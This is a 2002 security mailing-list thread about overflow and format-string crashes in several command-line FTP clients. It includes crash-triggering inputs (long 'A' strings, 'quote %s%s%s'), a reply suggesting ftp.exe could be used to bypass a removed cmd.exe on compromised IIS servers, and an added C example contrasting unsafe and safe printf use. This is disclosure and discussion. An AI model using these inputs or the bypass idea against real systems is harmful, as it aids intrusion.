Vulnerability Development mailing list archives
RE: Multiple Local Vulnerabilities in some FTP Client.Who can exploitit by remote?
From: "Brett Moore" <brett () softwarecreations co nz>
Date: Mon, 6 May 2002 12:47:42 +1200
Hi.

You said:
"This is a client-side bug the client themselves would have to exploit making it irrelevant."

Think about this, because I do.

IIS server, unpatched for unicode (or similar/new variant). The server has had the cmd.exe renamed/removed/acl protected, therefore preventing command execution.

But they forgot FTP.exe, so we bof the ftp client and inject and run any code we like, therefore bypassing the 'protection' given by removing cmd.exe.

Brett

-----Original Message-----
From: Stan Bubrouski [mailto:stan () ccs neu edu]
Sent: Monday, 6 May 2002 08:02
To: lion
Cc: vuln-dev () securityfocus com
Subject: Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploitit by remote?

lion wrote:

> Multiple Local Vulnerabilities in some FTP Client.
>
> 1. Windows 2000 and other Version FTP Client Overflows and Format String Vulnerability.
>
> a.
> d:\>perl -e "printf 'A'x3000"|ftp
> Invalid command.
> ftp>
> will see the 0x4141414d memory addr not be read error.
>
> d:\>perl -e "printf 'open '. 'A'x3000"|ftp
> Already connected to (null), use disconnect first.

This is a client-side bug the client themselves would have to exploit, making it irrelevant.

> will see the 0x4141414d memory addr not be read error.
>
> b.
> d:\>ftp localhost
> Connected to lion.
> 220 lion Microsoft FTP Service (Version 5.0).
> User (lion:(none)): ftp
> 331 Anonymous access allowed, send identity (e-mail name) as password.
> Password:
> 230 Anonymous user logged in.
> ftp> debug
> Debugging On .
> ftp> cd AAAAAAAAAA ('A' x 500)
> 500 Command was too long
> 421 Terminating connection.
> Connection closed by remote host.
> ftp> debug
> Debugging On .
> ftp> open localhost
> Connected to lion.
> 220 lion Microsoft FTP Service (Version 5.0).
> User (lion:(none)): ftp
> ---> USER ftp
> 331 Anonymous access allowed, send identity (e-mail name) as password.
> Password:
> ---> PASS f
> 230 Anonymous user logged in.
> ftp> cd AAAAAAAAAAAAAAAA ('A'x 2000)
> will see the 0x41414141 memory addr not be read error.

Client-side, again no remote threat.

> ftp> ls AAAAAAAAAAAAAAAA ('A'x 2000)
> ---> PORT 127,0,0,1,4,114
> 200 PORT command successful.
> ---> NLST AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ..
> will see the 0x41414141 memory addr not be read error.

Client-side, again no remote threat.

> c.
> d:\>ftp localhost
> Connected to lion.
> 220 lion Microsoft FTP Service (Version 5.0).
> User (lion:(none)): ftp
> 331 Anonymous access allowed, send identity (e-mail name) as password.
> Password:
> 230 Anonymous user logged in.
> ftp> debug
> Debugging On .
> ftp> quote %s
> ---> quote %s
> 500 'QUOTE %s': command not understood
> ftp> quote %s%s%s
> ---> quote %s%s%s?(null)
> 500 'QUOTE %s%s%s (null)': command not understood
> ftp> quote %s%s%s%s%s%s%s%s
> --->
> will see the 0x73257325 memory addr not be read error.
>
> Use W32Dasm to disassemble the ftp.exe, we can find the
> 780127A8 mov dword ptr [eax],ecx
> This is a character with win2000 Format Strings Vulnerability.

Client-side, again no remote threat.

> 2. Cygwin version 2.194.2.21 and Redhat 6.2 FTP Client Format String Vulnerability.
>
> lion@LION ~ $ ftp localhost
> Connected to lion.
> 220 lion Microsoft FTP Service (Version 5.0).
> Name (localhost:lion): ftp
> 331 Anonymous access allowed, send identity (e-mail name) as password.
> Password:
> 230 Anonymous user logged in.
> Remote system type is Windows_NT.
> ftp> debug
> Debugging on (debug=1).
> ftp> quote %s
> ---> %s
> 500 '%S': command not understood
> ftp> quote %s%s%s%s%s%s%s
> Segmentation fault (core dumped)
>
> Who can exploit it by remote?
>
> Sorry for my poor English.:)
>
> Lion
> lion () cnhonker net
> HUC

None of these bugs are remotely exploitable, and the Red Hat 6.2 FTP client was patched over a year ago and it was irrelevant because it was client-side. Nevertheless these bugs should be fixed at some point for stability of the FTP clients if nothing else.

Best Regards,
Stan Bubrouski
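
The `quote %s` crashes in the quoted sessions are what happens when a typed line reaches a printf-style function as the format string. The following is an added example, not part of the original posts and not taken from any FTP client's source: it assumes the debug echo ("---> ...") is built that way, and the function names are hypothetical.

```c
#include <stdio.h>
#include <string.h>

#ifdef SHOW_UNSAFE
/* Vulnerable pattern (assumed, not from any client's source): the typed line
   is the format string, so "%s" makes snprintf read arguments that were never
   passed. Only compiled when SHOW_UNSAFE is defined; never call it on input. */
static int echo_unsafe(char *out, size_t n, const char *line) {
    return snprintf(out, n, line);
}
#endif

/* Hardened echo: the typed line is data under a constant format string. */
static int echo_safe(char *out, size_t n, const char *line) {
    return snprintf(out, n, "---> %s", line);
}

/* Count conversion directives; "%%" is a literal percent sign, not one.
   Each directive is at least one argument an unsafe echo would fetch. */
static int count_directives(const char *s) {
    int count = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        if (s[1] != '\0') count++;
    }
    return count;
}

/* Returns 1 when the safe echo reproduces the input byte for byte. */
static int echoes_verbatim(const char *line) {
    char buf[256];
    int len = echo_safe(buf, sizeof buf, line);
    return len == (int)strlen(line) + 5 && strcmp(buf + 5, line) == 0;
}

int main(void) {
    /* Lines typed at the ftp> prompt in the quoted sessions. */
    const char *lines[] = { "quote %s", "quote %s%s%s", "quote %s%s%s%s%s%s%s%s" };
    for (size_t i = 0; i < 3; i++)
        printf("%-24s directives=%d verbatim=%d\n", lines[i],
               count_directives(lines[i]), echoes_verbatim(lines[i]));
    return 0;
}
```

Building with `-Wformat -Wformat-security` (GCC or Clang) flags the `echo_unsafe` pattern at compile time.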